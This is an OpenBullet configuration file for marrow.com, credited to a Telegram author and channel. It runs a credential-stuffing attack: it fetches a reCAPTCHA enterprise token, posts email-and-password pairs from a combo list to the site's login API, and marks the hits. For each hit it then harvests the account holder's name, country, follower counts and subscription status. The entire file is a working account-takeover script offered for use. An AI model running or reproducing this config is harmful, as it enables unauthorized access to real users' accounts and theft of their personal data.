[SETTINGS]
{
  "Name": "marrow.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-04-07T01:30:00.0951835+04:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@wanted_boy",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=npGaewopg1UaB8CNtYfx-y1j&size=invisible&cb=hlh1u4x1q07e" 
  
  HEADER "Host: www.google.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://marrow.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: iframe" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Te: trailers" 

#Token PARSE "<SOURCE>" CSS "[id=recaptcha-token]" "value" -> VAR "Token" 

#Post REQUEST POST "https://www.google.com/recaptcha/enterprise/reload?k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj" 
  CONTENT "npGaewopg1UaB8CNtYfx-y1j&reason=q&c=<Token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.google.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Origin: https://www.google.com" 
  HEADER "Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=gZWLhEUEJFxEhoT5hpjn2xHK&k=6LepPjoUAAAAAJ5Tt6eEMjwkKfYUeQjMRY_qQVeP" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Te: trailers" 

#rresp PARSE "<SOURCE>" LR "[\"rresp\",\"" "\"" -> VAR "rresp" 

#Get REQUEST GET "https://marrow.com/user/login" 
  
  HEADER "Host: marrow.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Te: trailers" 
  HEADER "Connection: close" 

#Time FUNCTION CurrentUnixTime -> VAR "Time" 

#Login REQUEST POST "https://marrow.com/api/user/email_login" 
  CONTENT "{\"email\":\"<USER>\",\"captchaReference\":\"\",\"captchaTime\":<Time>,\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: marrow.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Csrf-Token: <HEADERS(X-CSRF-Token)>" 
  HEADER "Origin: https://marrow.com" 
  HEADER "Referer: https://marrow.com/user/login" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Te: trailers" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\": \"success" 
  KEYCHAIN Failure OR 
    KEY "The email id or password that you entered is incorrect" 

#c PARSE "<SOURCE>" JSON "data.data.country" JTokenParsing=TRUE -> VAR "c" 

#country FUNCTION Translate 
  KEY "US" VALUE "United States" 
  KEY "CA" VALUE "Canada" 
  KEY "GB" VALUE "United Kingdom" 
  KEY "AU" VALUE "Australia" 
  KEY "SE" VALUE "Sweden" 
  KEY "ES" VALUE "Spain" 
  KEY "FR" VALUE "France" 
  KEY "IT" VALUE "Italy" 
  KEY "DE" VALUE "Germany" 
  KEY "NL" VALUE "Netherlands" 
  KEY "PL" VALUE "Poland" 
  KEY "NO" VALUE "Norway" 
  KEY "BR" VALUE "Brazil" 
  KEY "CH" VALUE "Switzerland" 
  KEY "TR" VALUE "Turkey" 
  KEY "IN" VALUE "India" 
  KEY "IE" VALUE "Ireland" 
  KEY "MX" VALUE "Mexico" 
  KEY "DK" VALUE "Denmark" 
  KEY "FI" VALUE "Finland" 
  KEY "AT" VALUE "Austria" 
  KEY "RU" VALUE "Russian Federation" 
  KEY "UA" VALUE "Ukraine" 
  KEY "BE" VALUE "Belgium" 
  KEY "BG" VALUE "Bulgaria" 
  KEY "SK" VALUE "Slovakia" 
  KEY "SI" VALUE "Slovenia" 
  KEY "RO" VALUE "Romania" 
  KEY "PT" VALUE "Portugal" 
  KEY "LV" VALUE "Latvia" 
  KEY "LI" VALUE "Liechtenstein" 
  KEY "LT" VALUE "Lithuania" 
  KEY "LU" VALUE "Luxembourg" 
  KEY "AN" VALUE "Netherlands Antilles" 
  KEY "HR" VALUE "Croatia" 
  KEY "CY" VALUE "Cyprus" 
  KEY "CZ" VALUE "Czech Republic" 
  KEY "EE" VALUE "Estonia" 
  KEY "HU" VALUE "Hungary" 
  KEY "IS" VALUE "Iceland" 
  KEY "GR" VALUE "Greece" 
  KEY "AF" VALUE "Afghanistan" 
  KEY "AL" VALUE "Albania" 
  KEY "DZ" VALUE "Algeria" 
  KEY "AS" VALUE "American Samoa" 
  KEY "AD" VALUE "Andorra" 
  KEY "AO" VALUE "Angola" 
  KEY "AI" VALUE "Anguilla" 
  KEY "AQ" VALUE "Antarctica" 
  KEY "AG" VALUE "Antigua & Barbuda" 
  KEY "AR" VALUE "Argentina" 
  KEY "AM" VALUE "Armenia" 
  KEY "AW" VALUE "Aruba" 
  KEY "AZ" VALUE "Azerbaijan" 
  KEY "BS" VALUE "Bahamas" 
  KEY "BH" VALUE "Bahrain" 
  KEY "BD" VALUE "Bangladesh" 
  KEY "BB" VALUE "Barbados" 
  KEY "BY" VALUE "Belarus" 
  KEY "BZ" VALUE "Belize" 
  KEY "BJ" VALUE "Benin" 
  KEY "BM" VALUE "Bermuda" 
  KEY "BT" VALUE "Bhutan" 
  KEY "BO" VALUE "Bolivia" 
  KEY "BA" VALUE "Bosnia & Herzegovina" 
  KEY "BW" VALUE "Botswana" 
  KEY "BV" VALUE "Bouvet Island" 
  KEY "IO" VALUE "British Indian Ocean Territory" 
  KEY "BN" VALUE "Brunei Darussalam" 
  KEY "BF" VALUE "Burkina Faso" 
  KEY "BI" VALUE "Burundi" 
  KEY "KH" VALUE "Cambodia" 
  KEY "CM" VALUE "Cameroon" 
  KEY "CV" VALUE "Cape Verde" 
  KEY "KY" VALUE "Cayman Islands" 
  KEY "CF" VALUE "Central African Republic" 
  KEY "TD" VALUE "Chad" 
  KEY "CL" VALUE "Chile" 
  KEY "CN" VALUE "People's Republic Of China" 
  KEY "CX" VALUE "Christmas Island" 
  KEY "CC" VALUE "Cocos (Keeling) Islands" 
  KEY "CO" VALUE "Colombia" 
  KEY "KM" VALUE "Comoros" 
  KEY "CG" VALUE "Congo" 
  KEY "CD" VALUE "Congo, The Democratic Republic Of" 
  KEY "CK" VALUE "Cook Islands" 
  KEY "CR" VALUE "Costa Rica" 
  KEY "CI" VALUE "Côte D'Ivoire" 
  KEY "CU" VALUE "Cuba" 
  KEY "DJ" VALUE "Djibouti" 
  KEY "DM" VALUE "Dominica" 
  KEY "DO" VALUE "Dominican Republic" 
  KEY "EC" VALUE "Ecuador" 
  KEY "EG" VALUE "Egypt" 
  KEY "EH" VALUE "Western Sahara" 
  KEY "SV" VALUE "El Salvador" 
  KEY "GQ" VALUE "Equatorial Guinea" 
  KEY "ER" VALUE "Eritrea" 
  KEY "ET" VALUE "Ethiopia" 
  KEY "FK" VALUE "Falkland Islands (Malvinas)" 
  KEY "FO" VALUE "Faroe Islands" 
  KEY "FJ" VALUE "Fiji" 
  KEY "GF" VALUE "French Guiana" 
  KEY "PF" VALUE "French Polynesia" 
  KEY "TF" VALUE "French Southern Territories" 
  KEY "GA" VALUE "Gabon" 
  KEY "GG" VALUE "Guernsey" 
  KEY "GM" VALUE "Gambia" 
  KEY "GE" VALUE "Georgia" 
  KEY "GH" VALUE "Ghana" 
  KEY "GI" VALUE "Gibraltar" 
  KEY "GL" VALUE "Greenland" 
  KEY "GD" VALUE "Grenada" 
  KEY "GP" VALUE "Guadeloupe" 
  KEY "GU" VALUE "Guam" 
  KEY "GT" VALUE "Guatemala" 
  KEY "GN" VALUE "Guinea" 
  KEY "GW" VALUE "Guinea-Bissau" 
  KEY "GY" VALUE "Guyana" 
  KEY "HT" VALUE "Haiti" 
  KEY "HM" VALUE "Heard Island & Mcdonald Islands" 
  KEY "HN" VALUE "Honduras" 
  KEY "HK" VALUE "Hong Kong" 
  KEY "ID" VALUE "Indonesia" 
  KEY "IR" VALUE "Iran, Islamic Republic Of" 
  KEY "IQ" VALUE "Iraq" 
  KEY "IL" VALUE "Israel" 
  KEY "JM" VALUE "Jamaica" 
  KEY "JP" VALUE "Japan" 
  KEY "JO" VALUE "Jordan" 
  KEY "KZ" VALUE "Kazakhstan" 
  KEY "KE" VALUE "Kenya" 
  KEY "KI" VALUE "Kiribati" 
  KEY "KP" VALUE "Korea, Democratic People's Republic Of" 
  KEY "KR" VALUE "Korea, Republic Of" 
  KEY "KW" VALUE "Kuwait" 
  KEY "KG" VALUE "Kyrgyzstan" 
  KEY "LA" VALUE "Lao People's Democratic Republic" 
  KEY "LB" VALUE "Lebanon" 
  KEY "LS" VALUE "Lesotho" 
  KEY "LR" VALUE "Liberia" 
  KEY "LY" VALUE "Libyan Arab Jamahiriya" 
  KEY "MO" VALUE "Macao" 
  KEY "MK" VALUE "Macedonia, The Former Yugoslav Republic Of" 
  KEY "MG" VALUE "Madagascar" 
  KEY "MW" VALUE "Malawi" 
  KEY "MY" VALUE "Malaysia" 
  KEY "MV" VALUE "Maldives" 
  KEY "ML" VALUE "Mali" 
  KEY "MT" VALUE "Malta" 
  KEY "MH" VALUE "Marshall Islands" 
  KEY "MQ" VALUE "Martinique" 
  KEY "MR" VALUE "Mauritania" 
  KEY "MU" VALUE "Mauritius" 
  KEY "YT" VALUE "Mayotte" 
  KEY "FM" VALUE "Micronesia, Federated States Of" 
  KEY "MD" VALUE "Moldova, Republic Of" 
  KEY "MC" VALUE "Monaco" 
  KEY "MN" VALUE "Mongolia" 
  KEY "MS" VALUE "Montserrat" 
  KEY "MA" VALUE "Morocco" 
  KEY "MZ" VALUE "Mozambique" 
  KEY "MM" VALUE "Myanmar" 
  KEY "NA" VALUE "Namibia" 
  KEY "NR" VALUE "Nauru" 
  KEY "NP" VALUE "Nepal" 
  KEY "NC" VALUE "New Caledonia" 
  KEY "NZ" VALUE "New Zealand" 
  KEY "NI" VALUE "Nicaragua" 
  KEY "NE" VALUE "Niger" 
  KEY "NG" VALUE "Nigeria" 
  KEY "NU" VALUE "Niue" 
  KEY "NF" VALUE "Norfolk Island" 
  KEY "MP" VALUE "Northern Mariana Islands" 
  KEY "OM" VALUE "Oman" 
  KEY "PK" VALUE "Pakistan" 
  KEY "PW" VALUE "Palau" 
  KEY "PS" VALUE "Palestinian Territory, Occupied" 
  KEY "PA" VALUE "Panama" 
  KEY "PG" VALUE "Papua New Guinea" 
  KEY "PY" VALUE "Paraguay" 
  KEY "PE" VALUE "Peru" 
  KEY "PH" VALUE "Philippines" 
  KEY "PN" VALUE "Pitcairn" 
  KEY "PR" VALUE "Puerto Rico" 
  KEY "QA" VALUE "Qatar" 
  KEY "RE" VALUE "Réunion" 
  KEY "RW" VALUE "Rwanda" 
  KEY "SH" VALUE "Saint Helena" 
  KEY "KN" VALUE "Saint Kitts & Nevis" 
  KEY "LC" VALUE "Saint Lucia" 
  KEY "PM" VALUE "Saint Pierre & Miquelon" 
  KEY "VC" VALUE "Saint Vincent & The Grenadines" 
  KEY "WS" VALUE "Samoa" 
  KEY "SM" VALUE "San Marino" 
  KEY "ST" VALUE "Sao Tome & Principe" 
  KEY "SA" VALUE "Saudi Arabia" 
  KEY "SN" VALUE "Senegal" 
  KEY "CS" VALUE "Serbia & Montenegro" 
  KEY "SC" VALUE "Seychelles" 
  KEY "SL" VALUE "Sierra Leone" 
  KEY "SG" VALUE "Singapore" 
  KEY "SB" VALUE "Solomon Islands" 
  KEY "SO" VALUE "Somalia" 
  KEY "ZA" VALUE "South Africa" 
  KEY "GS" VALUE "South Georgia & South Sandwich Islands" 
  KEY "LK" VALUE "Sri Lanka" 
  KEY "SD" VALUE "Sudan" 
  KEY "SR" VALUE "Suriname" 
  KEY "SJ" VALUE "Svalbard & Jan Mayen" 
  KEY "SZ" VALUE "Swaziland" 
  KEY "SY" VALUE "Syrian Arab Republic" 
  KEY "TW" VALUE "Taiwan, Republic Of China" 
  KEY "TJ" VALUE "Tajikistan" 
  KEY "TZ" VALUE "Tanzania, United Republic Of" 
  KEY "TH" VALUE "Thailand" 
  KEY "TL" VALUE "Timor-Leste" 
  KEY "TG" VALUE "Togo" 
  KEY "TK" VALUE "Tokelau" 
  KEY "TO" VALUE "Tonga" 
  KEY "TT" VALUE "Trinidad & Tobago" 
  KEY "TN" VALUE "Tunisia" 
  KEY "TM" VALUE "Turkmenistan" 
  KEY "TC" VALUE "Turks & Caicos Islands" 
  KEY "TV" VALUE "Tuvalu" 
  KEY "UG" VALUE "Uganda" 
  KEY "AE" VALUE "United Arab Emirates" 
  KEY "UM" VALUE "United States Minor Outlying Islands" 
  KEY "UY" VALUE "Uruguay" 
  KEY "UZ" VALUE "Uzbekistan" 
  KEY "VE" VALUE "Venezuela" 
  KEY "VU" VALUE "Vanuatu" 
  KEY "VN" VALUE "Viet Nam" 
  KEY "VG" VALUE "British Virgin Islands" 
  KEY "VI" VALUE "U.S. Virgin Islands" 
  KEY "WF" VALUE "Wallis & Futuna" 
  KEY "YE" VALUE "Yemen" 
  KEY "ZW" VALUE "Zimbabwe" 
  "<c>" -> VAR "country" 

#firstName PARSE "<SOURCE>" JSON "data.data.fname" JTokenParsing=TRUE -> VAR "firstName" 

#followCount PARSE "<SOURCE>" JSON "data.data.follow_count" JTokenParsing=TRUE -> VAR "followCount" 

#followersCount PARSE "<SOURCE>" JSON "data.data.followers_count" JTokenParsing=TRUE -> VAR "followersCount" 

#lastName PARSE "<SOURCE>" JSON "data.data.lname" JTokenParsing=TRUE -> VAR "lastName" 

#Get REQUEST GET "https://www.marrow.com/api/user/marrow-subscription" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-GB,en-US;q=0.9,en;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "DNT: 1" 
  HEADER "Host: www.marrow.com" 
  HEADER "Referer: https://www.marrow.com/user/login" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" 
  HEADER "X-CSRF-Token: <HEADERS(X-CSRF-Token)>" 

#data PARSE "<SOURCE>" JSON "data.data" JTokenParsing=TRUE -> VAR "data" 

IF "<data>" EqualTo "[]"
SET STATUS CUSTOM "FREE"
ENDIF
SET CAP "country" "<country>"
SET CAP "firstName" "<firstName>"
SET CAP "followCount" "<followCount>"
SET CAP "followersCount" "<followersCount>"
SET CAP "lastName" "<lastName>"
SET CAP "Author Telegram" "@wanted_boy"
SET CAP "Telegram Channel" "https://t.me/OpenBulletConfigs"

